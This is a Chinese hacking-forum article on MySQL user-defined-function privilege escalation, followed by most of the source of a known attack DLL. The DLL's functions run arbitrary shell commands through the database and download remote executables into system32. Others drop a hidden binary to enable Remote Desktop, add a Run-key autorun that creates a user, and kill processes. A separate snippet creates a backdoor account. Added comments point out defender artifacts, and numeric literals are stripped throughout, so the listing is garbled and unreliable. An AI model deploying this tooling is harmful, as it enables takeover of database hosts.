一点关于UDF的发散思路
Author:mer4en7y
Team:90sec
声明:UDF源码作者langouster

相信各位牛对UDF都不会陌生,看论坛叶总共享了一份UDF源码,以前一直没看过,于是看了看,写了这篇垃圾文章,在此抛砖引玉了,望大牛勿笑!
以cmdshell函数为例

cmdshell函数大家都不会陌生

// Excerpt of cmdshell() as quoted in the write-up: the shell image is resolved from the
// system directory and the output file from %temp%. The numeric literals and the path
// separators have been lost in this listing (compare the full source further down).
GetSystemDirectory(ShellPath,MAX_PATH-);
strcat(ShellPath,"cmd.exe");
GetEnvironmentVariable("temp",TempFilePath,MAX_PATH-);
strcat(TempFilePath,"2351213.tmp");

这里调用的是system32下的cmd,如果删除了那么函数就会失败,我们如何来发散一下呢
其实工具只是一个辅助,看下面一段简单代码:
这是一段用API函数添加普通用户的代码,我将原先的about函数稍微修改一下,替换为下面的代码

// Fragment the author proposes to paste into about(): creates a local user with a fixed
// name/password via NetUserAdd on the local machine (NULL server). Only the success branch
// is shown; `initid` and `length` are about()'s UDF parameters. Numeric literals are missing
// from this listing and the "\r\n" in the success string has lost its backslashes.
// Defender note: a NetUserAdd issued by mysqld.exe shows up as a local account-creation
// event (4720) attributed to the database service account — an unusual source worth alerting on.
NET_API_STATUS ret=;
DWORD dwErr=;
USER_INFO_1 oUserInfo;
ZeroMemory(&oUserInfo,sizeof(oUserInfo));
oUserInfo.usri1_name=L"90sec";
oUserInfo.usri1_password=L"90sec";
oUserInfo.usri1_priv=USER_PRIV_USER;
oUserInfo.usri1_flags=UF_NORMAL_ACCOUNT;
ret=NetUserAdd(NULL,,(LPBYTE)(&oUserInfo),&dwErr);
if(ret== NERR_Success)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"执行成功rn");
*length=strlen(initid->ptr);
return initid->ptr;
}

udf.dll 源码

#include "stdafx.h"
#include "stdio.h"
#include <windows.h>
#include <tlhelp32.h>
#include <stdlib.h>
#include <winsock.h>
#include <Urlmon.h>
#include "mysql.h"
#include "resource.h"
#include "mydebug.h"
#pragma comment(lib, "Urlmon.lib")
HANDLE g_module; // DLL module handle saved in DllMain; read by FindResource/LoadResource in open3389 and BackShell
//---------------------------------------------------------- ---------------------------
// DLL entry point: on process attach, remembers the module handle in g_module so the
// resource-dropping functions below can locate their embedded binaries. Always returns TRUE.
BOOL APIENTRY DllMain(HINSTANCE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
{
if(ul_reason_for_call==DLL_PROCESS_ATTACH)
g_module=hModule;
return TRUE;
}
//-------------------------------------------------------------------------------- -----------------------cmdshell
// Per-query init for cmdshell: only advertises a maximum result length (literal lost in
// this listing). initid->ptr is not initialised here; the first cmdshell() call sets it.
extern "C" __declspec(dllexport)my_bool cmdshell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
/*
 * UDF body for cmdshell(<command>): runs the string argument through cmd.exe with stdout
 * redirected to a temp file, then returns the file contents as the SQL result.
 * A new initid->ptr is malloc'd on every call and only the last one is freed in
 * cmdshell_deinit, so multi-row evaluation leaks one buffer per row.
 * Numeric literals (array/malloc sizes, CreateProcess flags, the wait timeout) are missing
 * from this listing, so buffer headroom cannot be verified from here.
 */
extern "C" __declspec(dllexport)char *cmdshell(UDF_INIT *initid, UDF_ARGS *args,
char *result, unsigned long *length,char *is_null, char *error)
{
 
// Wrong signature or the literal "help": return the usage text and run nothing.
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"执行CMD Shell函数.\r\n例:select cmdshell(\"dir c:\\\\\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
int RunStatus=;
char *cmdline,TempFilePath[MAX_PATH],ShellPath[MAX_PATH],temp[];
DWORD size=,len;
HANDLE hFile;
 
// Fixed locations: <system dir>\cmd.exe as the image and %temp%\2351213.tmp for output.
// mysqld.exe spawning cmd.exe, and this file name, are the host artifacts to key on.
GetSystemDirectory(ShellPath,MAX_PATH-);
strcat(ShellPath,"\\cmd.exe");
GetEnvironmentVariable("temp",TempFilePath,MAX_PATH-);
strcat(TempFilePath,"\\2351213.tmp");
 
// Builds " /c <argument>><tempfile>"; the argument is taken verbatim from the SQL caller.
// The malloc result is used unchecked.
cmdline=(char *)malloc(strlen(args->args[])+strlen(TempFilePath)+);
strcpy(cmdline," /c ");
strcat(cmdline,(args->args)[]);
strcat(cmdline,">");
strcat(cmdline,TempFilePath);
 
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.wShowWindow=SW_HIDE;
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
RunStatus=CreateProcess(ShellPath,cmdline,NULL,NULL,FALSE,,,,&si,&pi);
free(cmdline);
 
if(!RunStatus)
{
// Formats GetLastError into `temp`; the sprintf reads `temp` while writing into it
// (overlapping source and destination).
itoa(GetLastError(),temp,);
sprintf(temp,"Shell无法启动,GetLastError=%s\n",temp);
initid->ptr=(char *)malloc(strlen(temp)+);
strcpy(initid->ptr,temp);
(*length)=strlen(initid->ptr);
return initid->ptr;
}
 
// Blocks the mysqld worker thread until the child exits (timeout literal stripped).
// pi.hProcess and pi.hThread are never closed.
WaitForSingleObject(pi.hProcess,);
 
// collect the output
hFile=CreateFile(TempFilePath,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(hFile!=INVALID_HANDLE_VALUE)
{
// Whole file read into a buffer sized from GetFileSize plus a stripped constant; ReadFile's
// result and `len` are not checked, and the footer is then strcat'ed onto the same buffer.
size=GetFileSize(hFile,NULL);
initid->ptr=(char *)malloc(size+);
ReadFile(hFile,initid->ptr,size+,&len,NULL);
(initid->ptr)[size]='\0'
// (the statement above lacks its semicolon in this listing)
strcat(initid->ptr,"\r\n--------------------------------------------完成!\r\n");
 
// The output file is removed after reading.
CloseHandle(hFile);
DeleteFile(TempFilePath);
}
else
{
// Output file could not be opened: return only the footer.
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"\r\n--------------------------------------------完成!\r\n");
}
(*length)=strlen(initid->ptr);
return initid->ptr;
 
}
// Frees the buffer from the last cmdshell() call; buffers from earlier rows were never freed.
// (free(NULL) is a no-op, so the NULL test is redundant.)
extern "C" __declspec(dllexport)void cmdshell_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//---------------------------------------------------------------------------------------------------------------------------downloader
// Per-query init for downloader: advertises a maximum result length (literal lost in this
// listing); initid->ptr is not initialised here.
extern "C" __declspec(dllexport)my_bool downloader_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
/*
 * UDF body for downloader(<url>, <local path>): probes that the path is writable by creating
 * and deleting it, then fetches the URL into it with URLDownloadToFile (urlmon, linked by the
 * #pragma above; the call is synchronous). Argument indexes and malloc sizes are missing from
 * this listing. Host artifacts: a create/delete pair on the target path followed by a fresh
 * write, and an outbound HTTP fetch originating from mysqld.exe.
 */
extern "C" __declspec(dllexport)char *downloader(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"下载者函数\r\n例:select downloader(\"http://www.baidu.com/server.exe\",\"c:\\\\winnt\\\\system32\\\\ser.exe\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
HANDLE hFile;
char path[MAX_PATH];
 
// Unbounded copy of a caller-supplied path into a MAX_PATH stack buffer.
strcpy(path,(args->args)[]);
 
// Writability probe: create, close, delete.
hFile=CreateFile(path,GENERIC_WRITE,FILE_SHARE_READ, NULL,CREATE_ALWAYS,,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc(+strlen(path));
sprintf(initid->ptr,"文件创建失败,请确认目录存在且有写权限(%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
CloseHandle(hFile);
DeleteFile(path);
 
// The result message echoes the path or the URL back to the SQL caller; malloc results
// are unchecked in both branches.
if(URLDownloadToFile(NULL,(args->args)[],path,,)==S_OK)
{
initid->ptr=(char *)malloc(+strlen(path));
sprintf(initid->ptr,"下载文件成功(%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(+strlen((args->args)[]));
sprintf(initid->ptr,"下载文件出现错误,可能是网络原因(%s).",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
 
}
// Frees the buffer from the last downloader() call; buffers from earlier rows were never freed.
extern "C" __declspec(dllexport)void downloader_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------open3389
// Per-query init for open3389: advertises a maximum result length (literal lost in this
// listing); initid->ptr is not initialised here.
extern "C" __declspec(dllexport)my_bool open3389_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
/*
 * UDF body for open3389([port]): extracts embedded resource IDR_BIN1 to %temp%\457391.exe,
 * runs it hidden, waits for it, deletes it, then — when a port argument was given — writes
 * PortNumber under the two Terminal Server registry keys below. What the dropped binary does
 * is not visible in this source. Host artifacts: the fixed temp file name, mysqld.exe creating
 * a child process, and RegSetValue on the RDP-Tcp / rdpwd\Tds\tcp keys.
 * Numeric literals (argument counts/indexes, sizes, flags, timeouts) are missing from this listing.
 */
extern "C" __declspec(dllexport)char *open3389(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(!(args->arg_count== ||(args->arg_count== && args->arg_type[]==INT_RESULT)))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"通用开3389终端服务.修改端口需重启后生效.\r\n例:select open3389([端口]);");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
HRSRC hrsrc1;
HGLOBAL hglobal1;
HANDLE hFile;
char path[MAX_PATH];
DWORD size,size2;
 
// Fixed drop location.
GetEnvironmentVariable("temp",path,MAX_PATH-);
strcat(path,"\\457391.exe");
 
// Resource lookup through the module handle saved in DllMain.
hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN1), "BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"查找资源出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
size=SizeofResource((HMODULE)g_module, hrsrc1);
hglobal1=LoadResource((HMODULE)g_module, hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"载入资源出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
hFile = CreateFile(path,GENERIC_WRITE,, NULL,CREATE_ALWAYS,,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"创建临时文件出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
// Writes `size` plus a stripped constant from the locked resource; LockResource and WriteFile
// results are unchecked. GlobalFree is not the documented release for a LoadResource handle.
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
 
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.wShowWindow=SW_HIDE;
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
// Runs the dropped file with no command line; pi.hProcess/pi.hThread are never closed.
bool RunStatus=CreateProcess(path,NULL,NULL,NULL,FALSE,,,,&si,&pi);
if(!RunStatus)
{
DeleteFile(path);
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"运行临时文件出错,您的权限可能不够.");
*length=strlen(initid->ptr);
return initid->ptr;
}
// Blocks the mysqld worker thread until the child exits (timeout literal stripped).
WaitForSingleObject(pi.hProcess,);
DeleteFile(path);
// change the port
if(args->arg_count!= && args->arg_type[]==INT_RESULT)
{
HKEY key;
DWORD dwDisposition;
// MySQL passes INT_RESULT as a long long; it is truncated to a DWORD here.
DWORD port=*((long long *) args->args[]);
 
// RegCreateKeyEx return values are unchecked — if a call fails, `key` is passed
// uninitialised to RegSetValueEx. RegSetValueEx returns ERROR_SUCCESS (0) on success,
// which is what the `!` tests rely on.
RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp",,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,
NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
initid->ptr=(char *)malloc();
// %d with a DWORD argument; malloc size stripped, result unchecked.
sprintf(initid->ptr,"成功开启3389终端服务....\r\n成功修改终端服务端口为%d,重启后生效,重启系统可利用WindowsExit函数.",port);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
// Reached when either RegSetValueEx failed; `key` is whichever key was opened last.
RegCloseKey(key);
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"成功开启3389终端服务....\r\n修改终端服务端口失败.");
*length=strlen(initid->ptr);
return initid->ptr;
 
}
else
{
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"成功开启3389终端服务.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
// Frees the buffer from the last open3389() call; buffers from earlier rows were never freed.
extern "C" __declspec(dllexport)void open3389_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regread
// Per-query init for regread: advertises a maximum result length (literal lost in this
// listing); initid->ptr is not initialised here.
extern "C" __declspec(dllexport)my_bool regread_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
/*
 * UDF body for regread(<root>, <subkey>, <value name>): maps the root name to an HKEY, opens
 * the subkey with RegCreateKeyEx and, when it already existed, returns the value's raw bytes
 * as a string. Buffer sizes, argument indexes and the reserved/flags literals are missing
 * from this listing.
 */
extern "C" __declspec(dllexport)char *regread(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"读注册表函数.\r\n例:select regread(\"HKEY_LOCAL_MACHINE\",\"SYSTEM\\\\ControlSet001\\\\Services\\\\W3SVC\\\\Parameters\\\\Virtual Roots\",\"/\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
DWORD a,b,c;
BYTE bytere[];
HKEY key,key2;
// Root-name lookup. The literals "HKEY_CURRENT_USER " and "HKEY_USERS " carry a trailing
// space, so those roots only match if the caller passes the same trailing space.
if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[])==)
key=HKEY_LOCAL_MACHINE;
else if(strcmp("HKEY_CLASSES_ROOT",(args->args)[])==)
key=HKEY_CLASSES_ROOT ;
else if(strcmp("HKEY_CURRENT_USER ",(args->args)[])==)
key=HKEY_CURRENT_USER ;
else if(strcmp("HKEY_USERS ",(args->args)[])==)
key=HKEY_USERS ;
else
{
initid->ptr=(char *)malloc(+strlen((args->args)[]));
sprintf(initid->ptr,"未知的注册表句柄:%s\r\n",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
 
 
// RegCreateKeyEx rather than RegOpenKeyEx: a subkey that does not exist is created as a
// side effect and not removed afterwards; the disposition in `b` is what distinguishes the
// two cases. The call's own return value is unchecked.
RegCreateKeyEx(key,(args->args)[],,,REG_OPTION_NON_VOLATILE,KEY_QUERY_VALUE,NULL,&key2,&b);
if(b==REG_OPENED_EXISTING_KEY)
{
// `c` (in/out buffer size) is never initialised before the query. `a` receives the value
// type but is not consulted, so non-string data is copied with strcpy as if NUL-terminated.
if(!RegQueryValueEx(key2,(args->args)[],,&a,bytere,&c))
{
// CloseHandle is used on an HKEY here and below (RegCloseKey is the matching call).
CloseHandle(key2);
initid->ptr=(char *)malloc();
memset(initid->ptr,,);
strcpy(initid->ptr,(char *)bytere);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
CloseHandle(key2);
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"找不注册表值\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
else
{
// Key was just created (or the call failed and `b` is stale): report "key not found".
CloseHandle(key2);
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"找不注册表项\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
}
// Frees the buffer from the last regread() call; buffers from earlier rows were never freed.
extern "C" __declspec(dllexport)void regread_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regwrite
// Per-query init for regwrite: advertises a maximum result length (literal lost in this
// listing); initid->ptr is not initialised here.
extern "C" __declspec(dllexport)my_bool regwrite_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
/*
 * UDF body for regwrite(<root>, <subkey>, <value name>, <type name>, <data>): maps the root
 * and type names, creates/opens the subkey with KEY_ALL_ACCESS and writes the data string.
 * Whatever type name is chosen, the bytes written are always the data argument's characters
 * with an lstrlen-based length, so e.g. REG_DWORD receives string bytes, not a 4-byte value.
 * The usage text's own example is a Run-key autorun that runs `net user ... /add` — the
 * Run/RunOnce keys and that command-line shape are what to monitor for on a database host.
 * Argument indexes, the reserved literals and malloc sizes are missing from this listing.
 */
extern "C" __declspec(dllexport)char *regwrite(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
// (the string literal below is broken across two lines in this listing)
strcpy(initid->ptr,"写注册表函数.\r\n例:select regwrite(\"HKEY_LOCAL_MACHINE\",\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion
\\\\Run\",\"adduser\",\"REG_SZ\",\"cmd.exe /c net user langouster langouster /add\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
HKEY key,hkey;
DWORD dwDisposition,ktype;
 
// Root-name lookup; "HKEY_CURRENT_USER " and "HKEY_USERS " carry a trailing space in the
// literal, so they only match when the caller passes it too.
if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[])==)
hkey=HKEY_LOCAL_MACHINE;
else if(strcmp("HKEY_CLASSES_ROOT",(args->args)[])==)
hkey=HKEY_CLASSES_ROOT ;
else if(strcmp("HKEY_CURRENT_USER ",(args->args)[])==)
hkey=HKEY_CURRENT_USER ;
else if(strcmp("HKEY_USERS ",(args->args)[])==)
hkey=HKEY_USERS ;
else
{
initid->ptr=(char *)malloc(+strlen((args->args)[]));
sprintf(initid->ptr,"未知的注册表句柄:%s\r\n",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
 
// Type-name lookup only selects the REG_* tag passed to RegSetValueEx; the data is not converted.
if(strcmp("REG_BINARY",(args->args)[])==)
ktype=REG_BINARY;
else if(strcmp("REG_DWORD",(args->args)[])==)
ktype=REG_DWORD ;
else if(strcmp("REG_DWORD_LITTLE_ENDIAN",(args->args)[])==)
ktype=REG_DWORD_LITTLE_ENDIAN ;
else if(strcmp("REG_DWORD_BIG_ENDIAN",(args->args)[])==)
ktype=REG_DWORD_BIG_ENDIAN ;
else if(strcmp("REG_EXPAND_SZ",(args->args)[])==)
ktype=REG_EXPAND_SZ ;
else if(strcmp("REG_LINK",(args->args)[])==)
ktype=REG_LINK ;
else if(strcmp("REG_MULTI_SZ",(args->args)[])==)
ktype=REG_MULTI_SZ ;
else if(strcmp("REG_NONE",(args->args)[])==)
ktype=REG_NONE ;
else if(strcmp("REG_RESOURCE_LIST",(args->args)[])==)
ktype=REG_RESOURCE_LIST ;
else if(strcmp("REG_SZ",(args->args)[])==)
ktype=REG_SZ ;
else
{
initid->ptr=(char *)malloc(+strlen((args->args)[]));
sprintf(initid->ptr,"未知的注册表值类型:%s\r\n",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
 
// RegCreateKeyEx return value unchecked — `key` is uninitialised if it fails.
// RegSetValueEx returns ERROR_SUCCESS (0) on success, hence the `!` test.
RegCreateKeyEx(hkey,(args->args)[],,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,(args->args)[],,ktype,(BYTE *)(args->args)[],lstrlen((args->args)[])+))
{
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"写注册表成功\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"写注册表失败,可能是您的权限不够\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
// Unreachable: both branches above return first, so the key handle is never closed.
RegCloseKey(key);
 
}
// Frees the buffer from the last regwrite() call; buffers from earlier rows were never freed.
extern "C" __declspec(dllexport)void regwrite_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------KillProcess
// Per-query init for KillProcess: advertises a maximum result length (literal lost in this
// listing); initid->ptr is not initialised here.
extern "C" __declspec(dllexport)my_bool KillProcess_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
/*
 * UDF body for KillProcess(<exe name or decimal pid>): walks a Toolhelp process snapshot,
 * matches the argument case-insensitively against each entry's exe name or its decimal PID,
 * and terminates the first match. PID 0 doubles as the "not found" sentinel. Buffer sizes,
 * the itoa radix and the TerminateProcess exit code are missing from this listing.
 */
extern "C" __declspec(dllexport)char *KillProcess(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || (strcmp((args->args)[],"help")==))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"结束进程函数.\r\n例:select KillProcess(\"进程名 或 进程ID(十进制)\");\r\n程序目前还不能结束系统进程.");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
HANDLE hSnapshot = NULL;
DWORD processid=;
HANDLE hProcess;
char ProcessName[MAX_PATH],tempchar[];
PROCESSENTRY32 pe;
 
// Unbounded copy of the SQL-supplied argument into a MAX_PATH stack buffer.
strcpy(ProcessName,(args->args)[]);
// Snapshot and Process32First results are not checked before the loop.
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
pe.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
itoa(pe.th32ProcessID,tempchar,);
if(stricmp(pe.szExeFile,ProcessName)== || stricmp(tempchar,ProcessName)==)
{
processid=pe.th32ProcessID;
break;
}
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);
 
if(processid==)
{
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"找不到进程%s,请确认进程是否存在!",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
// OpenProcess result is unchecked; a NULL handle just makes TerminateProcess fail and
// lands in the "insufficient privilege" branch below.
hProcess=OpenProcess(PROCESS_TERMINATE,false,processid);
if(TerminateProcess(hProcess,))
{
CloseHandle(hProcess);
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"%s进程成功终止.",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
CloseHandle(hProcess);
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"%s进程终止失败,您的权限可能不足.",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
 
}
}
// Frees the buffer from the last KillProcess() call; buffers from earlier rows were never freed.
extern "C" __declspec(dllexport)void KillProcess_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------ProcessView
// Per-query init for ProcessView: advertises a maximum result length (literal lost in this
// listing); initid->ptr is not initialised here.
extern "C" __declspec(dllexport)my_bool ProcessView_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
/*
 * UDF body for ProcessView(): lists every process in a Toolhelp snapshot as "<exe>\t<pid>\r\n"
 * lines. The output is accumulated with strcat into one malloc'd buffer of fixed (stripped)
 * size with no bound check, so the total length is limited only by the process count.
 * `processid` is unused; snapshot/Process32First results are not checked.
 */
extern "C" __declspec(dllexport)char *ProcessView(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"枚举进程函数.\r\n例:select ProcessView();");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
HANDLE hSnapshot = NULL;
DWORD processid=;
PROCESSENTRY32 pe;
char tempchar[];
 
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
memset(initid->ptr,,);
 
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
pe.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
strcat(initid->ptr,pe.szExeFile);
strcat(initid->ptr,"\t");
itoa(pe.th32ProcessID,tempchar,);
strcat(initid->ptr,tempchar);
strcat(initid->ptr,"\r\n");
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);
*length=strlen(initid->ptr);
return initid->ptr;
 
}
// Frees the buffer from the last ProcessView() call; buffers from earlier rows were never freed.
extern "C" __declspec(dllexport)void ProcessView_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------WindowsExit
// Per-query init for WindowsExit: advertises a maximum result length (literal lost in this
// listing); initid->ptr is not initialised here.
extern "C" __declspec(dllexport)my_bool WindowsExit_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
/*
 * UDF body for WindowsExit("logoff"|"shutdown"|"reboot"): enables SE_SHUTDOWN_NAME on the
 * mysqld process token and calls ExitWindowsEx with the matching EWX_* flag plus EWX_FORCE.
 * hToken is never closed. Defender note: SeShutdownPrivilege being enabled in mysqld.exe
 * would be logged under privilege-use auditing before the shutdown itself.
 * Argument indexes, PrivilegeCount and the AdjustTokenPrivileges/ExitWindowsEx literals are
 * missing from this listing.
 */
extern "C" __declspec(dllexport)char *WindowsExit(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"关机重启注销函数.\r\n例:select WindowsExit(\"logoff|shutdown|reboot\");");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
HANDLE hToken;
TOKEN_PRIVILEGES token;
UINT Flag;
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"获得进程访问信令出错,您的权限可能不足.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
token.PrivilegeCount = ;
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &token.Privileges[].Luid);
token.Privileges[].Attributes=SE_PRIVILEGE_ENABLED;
// A non-zero return here only means the call succeeded; whether the privilege was actually
// assigned is reported via GetLastError (ERROR_NOT_ALL_ASSIGNED) and is not checked.
if(!AdjustTokenPrivileges(hToken,,&token, sizeof(token),,))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"获得关机令牌出错,您的权限可能不足.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
// Every mode is forced (EWX_FORCE): applications are not given a chance to save state.
if(stricmp(args->args[],"logoff")==)
Flag=EWX_LOGOFF|EWX_FORCE;
else if(stricmp(args->args[],"shutdown")==)
Flag=EWX_SHUTDOWN|EWX_FORCE;
else if(stricmp(args->args[],"reboot")==)
Flag=EWX_REBOOT|EWX_FORCE;
else
{
initid->ptr=(char *)malloc(+strlen(args->args[]));
if(initid->ptr==NULL)return NULL;
